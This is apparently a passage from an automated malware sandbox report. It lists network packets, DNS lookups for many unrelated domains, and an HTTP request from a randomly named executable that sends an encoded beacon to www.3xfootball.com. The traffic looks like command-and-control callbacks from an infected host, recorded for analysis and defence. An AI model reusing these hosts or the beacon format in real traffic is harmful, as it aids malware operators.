Jun 8, 2024 18:17:21.628308058 CEST	49778	80	192.168.2.4	217.196.55.202
Jun 8, 2024 18:17:21.633171082 CEST	80	49778	217.196.55.202	192.168.2.4
Jun 8, 2024 18:17:22.253537893 CEST	80	49778	217.196.55.202	192.168.2.4
Jun 8, 2024 18:17:22.274393082 CEST	80	49778	217.196.55.202	192.168.2.4
Jun 8, 2024 18:17:22.274529934 CEST	49778	80	192.168.2.4	217.196.55.202
Jun 8, 2024 18:17:22.275650978 CEST	49778	80	192.168.2.4	217.196.55.202
Jun 8, 2024 18:17:22.280517101 CEST	80	49778	217.196.55.202	192.168.2.4
Jun 8, 2024 18:17:43.692775011 CEST	49779	80	192.168.2.4	104.206.198.212
Jun 8, 2024 18:17:43.697871923 CEST	80	49779	104.206.198.212	192.168.2.4
Jun 8, 2024 18:17:43.699412107 CEST	49779	80	192.168.2.4	104.206.198.212
Jun 8, 2024 18:17:43.701431036 CEST	49779	80	192.168.2.4	104.206.198.212
Jun 8, 2024 18:17:43.706437111 CEST	80	49779	104.206.198.212	192.168.2.4
Jun 8, 2024 18:17:44.437335968 CEST	80	49779	104.206.198.212	192.168.2.4
Jun 8, 2024 18:17:44.490639925 CEST	49779	80	192.168.2.4	104.206.198.212
Jun 8, 2024 18:17:44.492719889 CEST	80	49779	104.206.198.212	192.168.2.4
Jun 8, 2024 18:17:44.492789984 CEST	49779	80	192.168.2.4	104.206.198.212
Jun 8, 2024 18:17:45.209645987 CEST	49779	80	192.168.2.4	104.206.198.212
Jun 8, 2024 18:17:46.230602026 CEST	49780	80	192.168.2.4	104.206.198.212
Jun 8, 2024 18:17:46.238145113 CEST	80	49780	104.206.198.212	192.168.2.4
Jun 8, 2024 18:17:46.238867998 CEST	49780	80	192.168.2.4	104.206.198.212
Jun 8, 2024 18:17:46.240709066 CEST	49780	80	192.168.2.4	104.206.198.212
Jun 8, 2024 18:17:46.245671988 CEST	80	49780	104.206.198.212	192.168.2.4
Jun 8, 2024 18:17:46.968317032 CEST	80	49780	104.206.198.212	192.168.2.4
Jun 8, 2024 18:17:47.021877050 CEST	49780	80	192.168.2.4	104.206.198.212
Jun 8, 2024 18:17:47.023883104 CEST	80	49780	104.206.198.212	192.168.2.4
Jun 8, 2024 18:17:47.023946047 CEST	49780	80	192.168.2.4	104.206.198.212
Jun 8, 2024 18:17:47.756609917 CEST	49780	80	192.168.2.4	104.206.198.212
Jun 8, 2024 18:17:48.774719000 CEST	49781	80	192.168.2.4	104.206.198.212
Jun 8, 2024 18:17:48.779792070 CEST	80	49781	104.206.198.212	192.168.2.4
Jun 8, 2024 18:17:48.779877901 CEST	49781	80	192.168.2.4	104.206.198.212
Jun 8, 2024 18:17:48.782186031 CEST	49781	80	192.168.2.4	104.206.198.212
Jun 8, 2024 18:17:48.787544966 CEST	80	49781	104.206.198.212	192.168.2.4
Jun 8, 2024 18:17:48.787579060 CEST	80	49781	104.206.198.212	192.168.2.4
Jun 8, 2024 18:17:48.787609100 CEST	80	49781	104.206.198.212	192.168.2.4
Jun 8, 2024 18:17:48.787662983 CEST	80	49781	104.206.198.212	192.168.2.4
Jun 8, 2024 18:17:48.787692070 CEST	80	49781	104.206.198.212	192.168.2.4
Jun 8, 2024 18:17:48.787719965 CEST	80	49781	104.206.198.212	192.168.2.4
Jun 8, 2024 18:17:48.787798882 CEST	80	49781	104.206.198.212	192.168.2.4
Jun 8, 2024 18:17:48.787827015 CEST	80	49781	104.206.198.212	192.168.2.4
Jun 8, 2024 18:17:48.787859917 CEST	80	49781	104.206.198.212	192.168.2.4
Jun 8, 2024 18:17:49.494482994 CEST	80	49781	104.206.198.212	192.168.2.4
Jun 8, 2024 18:17:49.537523985 CEST	49781	80	192.168.2.4	104.206.198.212
Jun 8, 2024 18:17:49.557992935 CEST	80	49781	104.206.198.212	192.168.2.4
Jun 8, 2024 18:17:49.558166981 CEST	49781	80	192.168.2.4	104.206.198.212
Jun 8, 2024 18:17:50.287650108 CEST	49781	80	192.168.2.4	104.206.198.212
Jun 8, 2024 18:17:51.306658030 CEST	49782	80	192.168.2.4	104.206.198.212
Jun 8, 2024 18:17:51.312391043 CEST	80	49782	104.206.198.212	192.168.2.4
Jun 8, 2024 18:17:51.312693119 CEST	49782	80	192.168.2.4	104.206.198.212
Jun 8, 2024 18:17:51.315627098 CEST	49782	80	192.168.2.4	104.206.198.212
Jun 8, 2024 18:17:51.320801020 CEST	80	49782	104.206.198.212	192.168.2.4
Jun 8, 2024 18:17:52.991121054 CEST	80	49782	104.206.198.212	192.168.2.4
Jun 8, 2024 18:17:52.991267920 CEST	80	49782	104.206.198.212	192.168.2.4
Jun 8, 2024 18:17:52.991359949 CEST	49782	80	192.168.2.4	104.206.198.212
Jun 8, 2024 18:17:53.045964003 CEST	80	49782	104.206.198.212	192.168.2.4
Jun 8, 2024 18:17:53.046080112 CEST	49782	80	192.168.2.4	104.206.198.212
Jun 8, 2024 18:17:53.046788931 CEST	49782	80	192.168.2.4	104.206.198.212
Jun 8, 2024 18:17:53.051784039 CEST	80	49782	104.206.198.212	192.168.2.4
Jun 8, 2024 18:17:58.077260017 CEST	49783	80	192.168.2.4	194.58.112.174
Jun 8, 2024 18:17:58.082190990 CEST	80	49783	194.58.112.174	192.168.2.4
Jun 8, 2024 18:17:58.084588051 CEST	49783	80	192.168.2.4	194.58.112.174
Jun 8, 2024 18:17:58.088515997 CEST	49783	80	192.168.2.4	194.58.112.174
Jun 8, 2024 18:17:58.093461990 CEST	80	49783	194.58.112.174	192.168.2.4
Jun 8, 2024 18:17:58.966310978 CEST	80	49783	194.58.112.174	192.168.2.4
Jun 8, 2024 18:17:58.966336012 CEST	80	49783	194.58.112.174	192.168.2.4
Jun 8, 2024 18:17:58.966355085 CEST	80	49783	194.58.112.174	192.168.2.4
Jun 8, 2024 18:17:58.966368914 CEST	80	49783	194.58.112.174	192.168.2.4
Jun 8, 2024 18:17:58.966408968 CEST	49783	80	192.168.2.4	194.58.112.174
Jun 8, 2024 18:17:58.966408968 CEST	49783	80	192.168.2.4	194.58.112.174
Jun 8, 2024 18:17:59.112456083 CEST	80	49783	194.58.112.174	192.168.2.4
Jun 8, 2024 18:17:59.112512112 CEST	49783	80	192.168.2.4	194.58.112.174
Jun 8, 2024 18:17:59.600445986 CEST	49783	80	192.168.2.4	194.58.112.174
Jun 8, 2024 18:18:00.618683100 CEST	49784	80	192.168.2.4	194.58.112.174
Jun 8, 2024 18:18:00.623707056 CEST	80	49784	194.58.112.174	192.168.2.4
Jun 8, 2024 18:18:00.623785973 CEST	49784	80	192.168.2.4	194.58.112.174
Jun 8, 2024 18:18:00.625327110 CEST	49784	80	192.168.2.4	194.58.112.174
Jun 8, 2024 18:18:00.630275965 CEST	80	49784	194.58.112.174	192.168.2.4
Jun 8, 2024 18:18:01.501897097 CEST	80	49784	194.58.112.174	192.168.2.4
Jun 8, 2024 18:18:01.501951933 CEST	80	49784	194.58.112.174	192.168.2.4
Jun 8, 2024 18:18:01.501995087 CEST	80	49784	194.58.112.174	192.168.2.4
Jun 8, 2024 18:18:01.502027988 CEST	80	49784	194.58.112.174	192.168.2.4
Jun 8, 2024 18:18:01.502068043 CEST	49784	80	192.168.2.4	194.58.112.174
Jun 8, 2024 18:18:01.502135992 CEST	49784	80	192.168.2.4	194.58.112.174
Jun 8, 2024 18:18:01.646312952 CEST	80	49784	194.58.112.174	192.168.2.4
Jun 8, 2024 18:18:01.646750927 CEST	49784	80	192.168.2.4	194.58.112.174
Jun 8, 2024 18:18:02.134639025 CEST	49784	80	192.168.2.4	194.58.112.174
Jun 8, 2024 18:18:03.149478912 CEST	49785	80	192.168.2.4	194.58.112.174
Jun 8, 2024 18:18:03.154627085 CEST	80	49785	194.58.112.174	192.168.2.4
Jun 8, 2024 18:18:03.154700994 CEST	49785	80	192.168.2.4	194.58.112.174
Jun 8, 2024 18:18:03.156950951 CEST	49785	80	192.168.2.4	194.58.112.174
Jun 8, 2024 18:18:03.161950111 CEST	80	49785	194.58.112.174	192.168.2.4
Jun 8, 2024 18:18:03.161982059 CEST	80	49785	194.58.112.174	192.168.2.4
Jun 8, 2024 18:18:03.162031889 CEST	80	49785	194.58.112.174	192.168.2.4
Jun 8, 2024 18:18:03.162060976 CEST	80	49785	194.58.112.174	192.168.2.4
Jun 8, 2024 18:18:03.162089109 CEST	80	49785	194.58.112.174	192.168.2.4
Jun 8, 2024 18:18:03.162220001 CEST	80	49785	194.58.112.174	192.168.2.4
Jun 8, 2024 18:18:03.162271976 CEST	80	49785	194.58.112.174	192.168.2.4
Jun 8, 2024 18:18:03.162302971 CEST	80	49785	194.58.112.174	192.168.2.4
Jun 8, 2024 18:18:03.162352085 CEST	80	49785	194.58.112.174	192.168.2.4
Jun 8, 2024 18:18:04.037821054 CEST	80	49785	194.58.112.174	192.168.2.4
Jun 8, 2024 18:18:04.037868977 CEST	80	49785	194.58.112.174	192.168.2.4
Jun 8, 2024 18:18:04.037905931 CEST	80	49785	194.58.112.174	192.168.2.4
Jun 8, 2024 18:18:04.037941933 CEST	80	49785	194.58.112.174	192.168.2.4
Jun 8, 2024 18:18:04.038002014 CEST	49785	80	192.168.2.4	194.58.112.174
Jun 8, 2024 18:18:04.038037062 CEST	49785	80	192.168.2.4	194.58.112.174
Jun 8, 2024 18:18:04.330430031 CEST	80	49785	194.58.112.174	192.168.2.4
Jun 8, 2024 18:18:04.330492973 CEST	49785	80	192.168.2.4	194.58.112.174
Jun 8, 2024 18:18:04.662740946 CEST	49785	80	192.168.2.4	194.58.112.174
Jun 8, 2024 18:18:05.681006908 CEST	49786	80	192.168.2.4	194.58.112.174
Jun 8, 2024 18:18:05.686239004 CEST	80	49786	194.58.112.174	192.168.2.4
Jun 8, 2024 18:18:05.686378002 CEST	49786	80	192.168.2.4	194.58.112.174
Jun 8, 2024 18:18:05.687838078 CEST	49786	80	192.168.2.4	194.58.112.174
Jun 8, 2024 18:18:05.692725897 CEST	80	49786	194.58.112.174	192.168.2.4
Jun 8, 2024 18:18:06.567523956 CEST	80	49786	194.58.112.174	192.168.2.4
Jun 8, 2024 18:18:06.567581892 CEST	80	49786	194.58.112.174	192.168.2.4
Jun 8, 2024 18:18:06.567625999 CEST	80	49786	194.58.112.174	192.168.2.4
Jun 8, 2024 18:18:06.567636967 CEST	49786	80	192.168.2.4	194.58.112.174
Jun 8, 2024 18:18:06.567660093 CEST	80	49786	194.58.112.174	192.168.2.4
Jun 8, 2024 18:18:06.567702055 CEST	80	49786	194.58.112.174	192.168.2.4
Jun 8, 2024 18:18:06.567717075 CEST	49786	80	192.168.2.4	194.58.112.174
Jun 8, 2024 18:18:06.567735910 CEST	80	49786	194.58.112.174	192.168.2.4
Jun 8, 2024 18:18:06.567770958 CEST	80	49786	194.58.112.174	192.168.2.4
Jun 8, 2024 18:18:06.567790031 CEST	49786	80	192.168.2.4	194.58.112.174
Jun 8, 2024 18:18:06.567804098 CEST	80	49786	194.58.112.174	192.168.2.4
Jun 8, 2024 18:18:06.567843914 CEST	80	49786	194.58.112.174	192.168.2.4
Jun 8, 2024 18:18:06.567845106 CEST	49786	80	192.168.2.4	194.58.112.174
Jun 8, 2024 18:18:06.615645885 CEST	49786	80	192.168.2.4	194.58.112.174
Jun 8, 2024 18:18:06.713707924 CEST	80	49786	194.58.112.174	192.168.2.4
Jun 8, 2024 18:18:06.713809967 CEST	49786	80	192.168.2.4	194.58.112.174
Jun 8, 2024 18:18:06.714993954 CEST	49786	80	192.168.2.4	194.58.112.174
Jun 8, 2024 18:18:06.719985962 CEST	80	49786	194.58.112.174	192.168.2.4
Jun 8, 2024 18:18:14.776813984 CEST	49787	80	192.168.2.4	154.215.72.110
Jun 8, 2024 18:18:14.916635036 CEST	80	49787	154.215.72.110	192.168.2.4
Jun 8, 2024 18:18:14.916896105 CEST	49787	80	192.168.2.4	154.215.72.110
Jun 8, 2024 18:18:14.918565989 CEST	49787	80	192.168.2.4	154.215.72.110
Jun 8, 2024 18:18:14.925091028 CEST	80	49787	154.215.72.110	192.168.2.4
Jun 8, 2024 18:18:15.903482914 CEST	80	49787	154.215.72.110	192.168.2.4
Jun 8, 2024 18:18:15.943985939 CEST	49787	80	192.168.2.4	154.215.72.110
Jun 8, 2024 18:18:16.100816011 CEST	80	49787	154.215.72.110	192.168.2.4
Jun 8, 2024 18:18:16.100995064 CEST	49787	80	192.168.2.4	154.215.72.110
Jun 8, 2024 18:18:16.101732016 CEST	49787	80	192.168.2.4	154.215.72.110
Jun 8, 2024 18:18:16.106602907 CEST	80	49787	154.215.72.110	192.168.2.4
Jun 8, 2024 18:18:21.556610107 CEST	49788	80	192.168.2.4	202.172.28.202
Jun 8, 2024 18:18:21.561670065 CEST	80	49788	202.172.28.202	192.168.2.4
Jun 8, 2024 18:18:21.562001944 CEST	49788	80	192.168.2.4	202.172.28.202
Jun 8, 2024 18:18:21.563852072 CEST	49788	80	192.168.2.4	202.172.28.202
Jun 8, 2024 18:18:21.568727970 CEST	80	49788	202.172.28.202	192.168.2.4
Jun 8, 2024 18:18:22.729505062 CEST	80	49788	202.172.28.202	192.168.2.4
Jun 8, 2024 18:18:22.771930933 CEST	49788	80	192.168.2.4	202.172.28.202
Jun 8, 2024 18:18:23.068898916 CEST	49788	80	192.168.2.4	202.172.28.202
Jun 8, 2024 18:18:24.087151051 CEST	49789	80	192.168.2.4	202.172.28.202
Jun 8, 2024 18:18:24.092536926 CEST	80	49789	202.172.28.202	192.168.2.4
Jun 8, 2024 18:18:24.092643023 CEST	49789	80	192.168.2.4	202.172.28.202
Jun 8, 2024 18:18:24.094155073 CEST	49789	80	192.168.2.4	202.172.28.202
Jun 8, 2024 18:18:24.099117041 CEST	80	49789	202.172.28.202	192.168.2.4
Jun 8, 2024 18:18:24.980746031 CEST	80	49789	202.172.28.202	192.168.2.4
Jun 8, 2024 18:18:25.021907091 CEST	49789	80	192.168.2.4	202.172.28.202
Jun 8, 2024 18:18:25.600132942 CEST	49789	80	192.168.2.4	202.172.28.202
Jun 8, 2024 18:18:26.620028973 CEST	49790	80	192.168.2.4	202.172.28.202
Jun 8, 2024 18:18:26.625102043 CEST	80	49790	202.172.28.202	192.168.2.4
Jun 8, 2024 18:18:26.625199080 CEST	49790	80	192.168.2.4	202.172.28.202
Jun 8, 2024 18:18:26.628149986 CEST	49790	80	192.168.2.4	202.172.28.202
Jun 8, 2024 18:18:26.633214951 CEST	80	49790	202.172.28.202	192.168.2.4
Jun 8, 2024 18:18:26.633249044 CEST	80	49790	202.172.28.202	192.168.2.4
Jun 8, 2024 18:18:26.633332014 CEST	80	49790	202.172.28.202	192.168.2.4
Jun 8, 2024 18:18:26.633359909 CEST	80	49790	202.172.28.202	192.168.2.4
Jun 8, 2024 18:18:26.633411884 CEST	80	49790	202.172.28.202	192.168.2.4
Jun 8, 2024 18:18:26.633440018 CEST	80	49790	202.172.28.202	192.168.2.4
Jun 8, 2024 18:18:26.633466005 CEST	80	49790	202.172.28.202	192.168.2.4
Jun 8, 2024 18:18:26.633516073 CEST	80	49790	202.172.28.202	192.168.2.4
Jun 8, 2024 18:18:26.633543015 CEST	80	49790	202.172.28.202	192.168.2.4
Jun 8, 2024 18:18:27.496239901 CEST	80	49790	202.172.28.202	192.168.2.4
Jun 8, 2024 18:18:27.537600994 CEST	49790	80	192.168.2.4	202.172.28.202
Jun 8, 2024 18:18:27.639014006 CEST	80	49790	202.172.28.202	192.168.2.4
Jun 8, 2024 18:18:27.639138937 CEST	49790	80	192.168.2.4	202.172.28.202
Jun 8, 2024 18:18:28.133677006 CEST	49790	80	192.168.2.4	202.172.28.202

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 8, 2024 18:14:41.517436981 CEST	61407	53	192.168.2.4	1.1.1.1
Jun 8, 2024 18:14:42.522543907 CEST	53	61407	1.1.1.1	192.168.2.4
Jun 8, 2024 18:14:42.522754908 CEST	61407	53	192.168.2.4	1.1.1.1
Jun 8, 2024 18:14:42.529725075 CEST	53	61407	1.1.1.1	192.168.2.4
Jun 8, 2024 18:14:59.088326931 CEST	57150	53	192.168.2.4	1.1.1.1
Jun 8, 2024 18:14:59.617846012 CEST	53	57150	1.1.1.1	192.168.2.4
Jun 8, 2024 18:15:13.447535992 CEST	52801	53	192.168.2.4	1.1.1.1
Jun 8, 2024 18:15:14.443926096 CEST	52801	53	192.168.2.4	1.1.1.1
Jun 8, 2024 18:15:14.800657034 CEST	53	52801	1.1.1.1	192.168.2.4
Jun 8, 2024 18:15:14.800719023 CEST	53	52801	1.1.1.1	192.168.2.4
Jun 8, 2024 18:15:28.978014946 CEST	57768	53	192.168.2.4	1.1.1.1
Jun 8, 2024 18:15:29.000592947 CEST	53	57768	1.1.1.1	192.168.2.4
Jun 8, 2024 18:15:42.572498083 CEST	52846	53	192.168.2.4	1.1.1.1
Jun 8, 2024 18:15:42.677634001 CEST	53	52846	1.1.1.1	192.168.2.4
Jun 8, 2024 18:15:56.369720936 CEST	61448	53	192.168.2.4	1.1.1.1
Jun 8, 2024 18:15:56.384605885 CEST	53	61448	1.1.1.1	192.168.2.4
Jun 8, 2024 18:16:10.479933023 CEST	50827	53	192.168.2.4	1.1.1.1
Jun 8, 2024 18:16:10.523989916 CEST	53	50827	1.1.1.1	192.168.2.4
Jun 8, 2024 18:16:18.588917017 CEST	64017	53	192.168.2.4	1.1.1.1
Jun 8, 2024 18:16:18.605017900 CEST	53	64017	1.1.1.1	192.168.2.4
Jun 8, 2024 18:16:31.947093964 CEST	63742	53	192.168.2.4	1.1.1.1
Jun 8, 2024 18:16:32.023251057 CEST	53	63742	1.1.1.1	192.168.2.4
Jun 8, 2024 18:16:45.916623116 CEST	62234	53	192.168.2.4	1.1.1.1
Jun 8, 2024 18:16:46.401448011 CEST	53	62234	1.1.1.1	192.168.2.4
Jun 8, 2024 18:16:59.688091040 CEST	53308	53	192.168.2.4	1.1.1.1
Jun 8, 2024 18:17:00.370472908 CEST	53	53308	1.1.1.1	192.168.2.4
Jun 8, 2024 18:17:13.775441885 CEST	59116	53	192.168.2.4	1.1.1.1
Jun 8, 2024 18:17:14.014702082 CEST	53	59116	1.1.1.1	192.168.2.4
Jun 8, 2024 18:17:27.291462898 CEST	62372	53	192.168.2.4	1.1.1.1
Jun 8, 2024 18:17:27.491220951 CEST	53	62372	1.1.1.1	192.168.2.4
Jun 8, 2024 18:17:35.558662891 CEST	53354	53	192.168.2.4	1.1.1.1
Jun 8, 2024 18:17:35.569787979 CEST	53	53354	1.1.1.1	192.168.2.4
Jun 8, 2024 18:17:43.650197029 CEST	59164	53	192.168.2.4	1.1.1.1
Jun 8, 2024 18:17:43.690571070 CEST	53	59164	1.1.1.1	192.168.2.4
Jun 8, 2024 18:17:58.059767008 CEST	58719	53	192.168.2.4	1.1.1.1
Jun 8, 2024 18:17:58.073929071 CEST	53	58719	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jun 8, 2024 18:14:41.517436981 CEST	192.168.2.4	1.1.1.1	0x40a4	Standard query (0)	www.3xfootball.com	A (IP address)	IN (0x0001)	false
Jun 8, 2024 18:14:42.522754908 CEST	192.168.2.4	1.1.1.1	0x40a4	Standard query (0)	www.3xfootball.com	A (IP address)	IN (0x0001)	false
Jun 8, 2024 18:14:59.088326931 CEST	192.168.2.4	1.1.1.1	0x6162	Standard query (0)	www.kasegitai.tokyo	A (IP address)	IN (0x0001)	false
Jun 8, 2024 18:15:13.447535992 CEST	192.168.2.4	1.1.1.1	0xbb42	Standard query (0)	www.goldenjade-travel.com	A (IP address)	IN (0x0001)	false
Jun 8, 2024 18:15:14.443926096 CEST	192.168.2.4	1.1.1.1	0xbb42	Standard query (0)	www.goldenjade-travel.com	A (IP address)	IN (0x0001)	false
Jun 8, 2024 18:15:28.978014946 CEST	192.168.2.4	1.1.1.1	0xf1fd	Standard query (0)	www.antonio-vivaldi.mobi	A (IP address)	IN (0x0001)	false
Jun 8, 2024 18:15:42.572498083 CEST	192.168.2.4	1.1.1.1	0x50e2	Standard query (0)	www.magmadokum.com	A (IP address)	IN (0x0001)	false
Jun 8, 2024 18:15:56.369720936 CEST	192.168.2.4	1.1.1.1	0x68de	Standard query (0)	www.rssnewscast.com	A (IP address)	IN (0x0001)	false
Jun 8, 2024 18:16:10.479933023 CEST	192.168.2.4	1.1.1.1	0x29c7	Standard query (0)	www.liangyuen528.com	A (IP address)	IN (0x0001)	false
Jun 8, 2024 18:16:18.588917017 CEST	192.168.2.4	1.1.1.1	0x5363	Standard query (0)	www.techchains.info	A (IP address)	IN (0x0001)	false
Jun 8, 2024 18:16:31.947093964 CEST	192.168.2.4	1.1.1.1	0xa1fa	Standard query (0)	www.elettrosistemista.zip	A (IP address)	IN (0x0001)	false
Jun 8, 2024 18:16:45.916623116 CEST	192.168.2.4	1.1.1.1	0x7c5d	Standard query (0)	www.donnavariedades.com	A (IP address)	IN (0x0001)	false
Jun 8, 2024 18:16:59.688091040 CEST	192.168.2.4	1.1.1.1	0x57d2	Standard query (0)	www.660danm.top	A (IP address)	IN (0x0001)	false
Jun 8, 2024 18:17:13.775441885 CEST	192.168.2.4	1.1.1.1	0xadfb	Standard query (0)	www.empowermedeco.com	A (IP address)	IN (0x0001)	false
Jun 8, 2024 18:17:27.291462898 CEST	192.168.2.4	1.1.1.1	0x7c84	Standard query (0)	www.joyesi.xyz	A (IP address)	IN (0x0001)	false
Jun 8, 2024 18:17:35.558662891 CEST	192.168.2.4	1.1.1.1	0xa69a	Standard query (0)	www.k9vyp11no3.cfd	A (IP address)	IN (0x0001)	false
Jun 8, 2024 18:17:43.650197029 CEST	192.168.2.4	1.1.1.1	0x473e	Standard query (0)	www.shenzhoucui.com	A (IP address)	IN (0x0001)	false
Jun 8, 2024 18:17:58.059767008 CEST	192.168.2.4	1.1.1.1	0x6261	Standard query (0)	www.b301.space	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jun 8, 2024 18:14:42.522543907 CEST	1.1.1.1	192.168.2.4	0x40a4	No error (0)	www.3xfootball.com		154.215.72.110	A (IP address)	IN (0x0001)	false
Jun 8, 2024 18:14:42.529725075 CEST	1.1.1.1	192.168.2.4	0x40a4	No error (0)	www.3xfootball.com		154.215.72.110	A (IP address)	IN (0x0001)	false
Jun 8, 2024 18:14:59.617846012 CEST	1.1.1.1	192.168.2.4	0x6162	No error (0)	www.kasegitai.tokyo		202.172.28.202	A (IP address)	IN (0x0001)	false
Jun 8, 2024 18:15:14.800657034 CEST	1.1.1.1	192.168.2.4	0xbb42	No error (0)	www.goldenjade-travel.com		116.50.37.244	A (IP address)	IN (0x0001)	false
Jun 8, 2024 18:15:14.800719023 CEST	1.1.1.1	192.168.2.4	0xbb42	No error (0)	www.goldenjade-travel.com		116.50.37.244	A (IP address)	IN (0x0001)	false
Jun 8, 2024 18:15:29.000592947 CEST	1.1.1.1	192.168.2.4	0xf1fd	No error (0)	www.antonio-vivaldi.mobi		46.30.213.191	A (IP address)	IN (0x0001)	false
Jun 8, 2024 18:15:42.677634001 CEST	1.1.1.1	192.168.2.4	0x50e2	No error (0)	www.magmadokum.com	redirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Jun 8, 2024 18:15:42.677634001 CEST	1.1.1.1	192.168.2.4	0x50e2	No error (0)	redirect.natrocdn.com	natroredirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Jun 8, 2024 18:15:42.677634001 CEST	1.1.1.1	192.168.2.4	0x50e2	No error (0)	natroredirect.natrocdn.com		85.159.66.93	A (IP address)	IN (0x0001)	false
Jun 8, 2024 18:15:56.384605885 CEST	1.1.1.1	192.168.2.4	0x68de	No error (0)	www.rssnewscast.com		91.195.240.94	A (IP address)	IN (0x0001)	false
Jun 8, 2024 18:16:10.523989916 CEST	1.1.1.1	192.168.2.4	0x29c7	Server failure (2)	www.liangyuen528.com	none	none	A (IP address)	IN (0x0001)	false
Jun 8, 2024 18:16:18.605017900 CEST	1.1.1.1	192.168.2.4	0x5363	No error (0)	www.techchains.info		66.29.149.46	A (IP address)	IN (0x0001)	false
Jun 8, 2024 18:16:32.023251057 CEST	1.1.1.1	192.168.2.4	0xa1fa	No error (0)	www.elettrosistemista.zip	elettrosistemista.zip		CNAME (Canonical name)	IN (0x0001)	false
Jun 8, 2024 18:16:32.023251057 CEST	1.1.1.1	192.168.2.4	0xa1fa	No error (0)	elettrosistemista.zip		195.110.124.133	A (IP address)	IN (0x0001)	false
Jun 8, 2024 18:16:46.401448011 CEST	1.1.1.1	192.168.2.4	0x7c5d	No error (0)	www.donnavariedades.com	shops.myshopify.com		CNAME (Canonical name)	IN (0x0001)	false
Jun 8, 2024 18:16:46.401448011 CEST	1.1.1.1	192.168.2.4	0x7c5d	No error (0)	shops.myshopify.com		23.227.38.74	A (IP address)	IN (0x0001)	false
Jun 8, 2024 18:17:00.370472908 CEST	1.1.1.1	192.168.2.4	0x57d2	No error (0)	www.660danm.top		34.111.148.214	A (IP address)	IN (0x0001)	false
Jun 8, 2024 18:17:00.370472908 CEST	1.1.1.1	192.168.2.4	0x57d2	No error (0)	www.660danm.top		34.120.249.181	A (IP address)	IN (0x0001)	false
Jun 8, 2024 18:17:14.014702082 CEST	1.1.1.1	192.168.2.4	0xadfb	No error (0)	www.empowermedeco.com	empowermedeco.com		CNAME (Canonical name)	IN (0x0001)	false
Jun 8, 2024 18:17:14.014702082 CEST	1.1.1.1	192.168.2.4	0xadfb	No error (0)	empowermedeco.com		217.196.55.202	A (IP address)	IN (0x0001)	false
Jun 8, 2024 18:17:27.491220951 CEST	1.1.1.1	192.168.2.4	0x7c84	Server failure (2)	www.joyesi.xyz	none	none	A (IP address)	IN (0x0001)	false
Jun 8, 2024 18:17:35.569787979 CEST	1.1.1.1	192.168.2.4	0xa69a	Name error (3)	www.k9vyp11no3.cfd	none	none	A (IP address)	IN (0x0001)	false
Jun 8, 2024 18:17:43.690571070 CEST	1.1.1.1	192.168.2.4	0x473e	No error (0)	www.shenzhoucui.com		104.206.198.212	A (IP address)	IN (0x0001)	false
Jun 8, 2024 18:17:58.073929071 CEST	1.1.1.1	192.168.2.4	0x6261	No error (0)	www.b301.space		194.58.112.174	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.3xfootball.com

www.kasegitai.tokyo

www.goldenjade-travel.com

www.antonio-vivaldi.mobi

www.magmadokum.com

www.rssnewscast.com

www.techchains.info

www.elettrosistemista.zip

www.donnavariedades.com

www.660danm.top

www.empowermedeco.com

www.shenzhoucui.com

www.b301.space

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49737	154.215.72.110	80	3264	C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe

Timestamp	Bytes transferred	Direction	Data
Jun 8, 2024 18:14:42.575536966 CEST	498	OUT	GET /fo8o/?qD=FrMTb&aZ=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.3xfootball.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jun 8, 2024 18:14:43.847893953 CEST	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sat, 08 Jun 2024 16:14:43 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable 